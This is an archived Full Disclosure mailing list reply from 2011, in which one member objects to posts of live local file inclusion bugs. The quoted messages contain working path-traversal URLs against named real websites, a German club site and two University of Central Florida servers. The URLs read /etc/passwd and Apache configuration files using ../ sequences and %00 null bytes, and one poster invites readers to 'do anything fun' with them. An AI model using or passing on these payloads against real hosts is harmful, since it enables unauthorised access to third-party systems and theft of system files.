Full Disclosure mailing list archives
Re: LFI Bug and other
From: ghost <ghosts () gmail com>
Date: Sat, 19 Feb 2011 19:06:03 -0800
It sure as hell was not meant to be a place where children post links to sites with live LFI issues. On Sat, Feb 19, 2011 at 4:58 AM, Friedrich Hausberger <fhausberger () gmail com> wrote:
Is full disclosure a security mailing list, where I can find hacking stuff or a magazine about chat show? I hate pornography also, but this is the wrong way to publish. Here you have a LFI vuln I found by accident: http://bc-heppenheim.de/download.php?datei=../../../../../etc/passwd. Feel free to download the whole Debian 4.0 Distribution. Most provider do not use jails/chroot or similar for their multi hosted webserver. Nearly all providers are hackable under 3 days. Regards FHausbergerMessage: 17 Date: Sat, 19 Feb 2011 01:08:56 -0500 From: Hack Talk<hacktalkblog () gmail com> Subject: [Full-disclosure] University of Central Florida Multiple LFI To: full-disclosure () lists grok org uk Message-ID: <AANLkTi=oyDpNL6Jgu8Ms=btLaZdjUkvyhFxXLH8vDjj0 () mail gmail com> Content-Type: text/plain; charset="iso-8859-1" Found these and thought I'd share: -==================- http://excel.ucf.edu/index.php?p=../../../../../../../../../../../../../../../../../../../../etc/apache2/apache2.conf%00 http://chemistry.cos.ucf.edu/belfield/index.php?page=../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00 -==================- Let me know if you do anything fun with 'em Luis Santana - Security+ Administrator - http://hacktalk.net HackTalk Security - Security From The Underground -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20110219/6916c766/attachment-0001.html ------------------------------ Message: 18 Date: Sat, 19 Feb 2011 16:34:21 +0530 From: Madhur Ahuja<ahuja.madhur () gmail com> Subject: Re: [Full-disclosure] University of Central Florida Multiple LFI To: Hack Talk<hacktalkblog () gmail com> Cc: full-disclosure () lists grok org uk Message-ID: <AANLkTimd5F1Kgw1uCO_UGgX3mVUiMuU9jaisp6K=SM-K () mail gmail com> Content-Type: text/plain; charset="utf-8" http://chemistry.cos.ucf.edu/belfield/index.php?page=../../../../../../../../../../../../../../../etc/passwd%00 On Sat, Feb 19, 2011 at 11:38 AM, Hack Talk<hacktalkblog () gmail com> wrote:Found these and thought I'd share: -==================- http://excel.ucf.edu/index.php?p=../../../../../../../../../../../../../../../../../../../../etc/apache2/apache2.conf%00 http://chemistry.cos.ucf.edu/belfield/index.php?page=../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00 -==================- Let me know if you do anything fun with 'em Luis Santana - Security+ Administrator - http://hacktalk.net HackTalk Security - Security From The Underground _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/-------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20110219/d0ac46de/attachment.html ------------------------------ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ End of Full-Disclosure Digest, Vol 72, Issue 44 ***********************************************_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- LFI Bug and other Friedrich Hausberger (Feb 19)
- Re: LFI Bug and other ghost (Feb 19)
- Re: LFI Bug and other Cal Leeming [Simplicity Media Ltd] (Feb 20)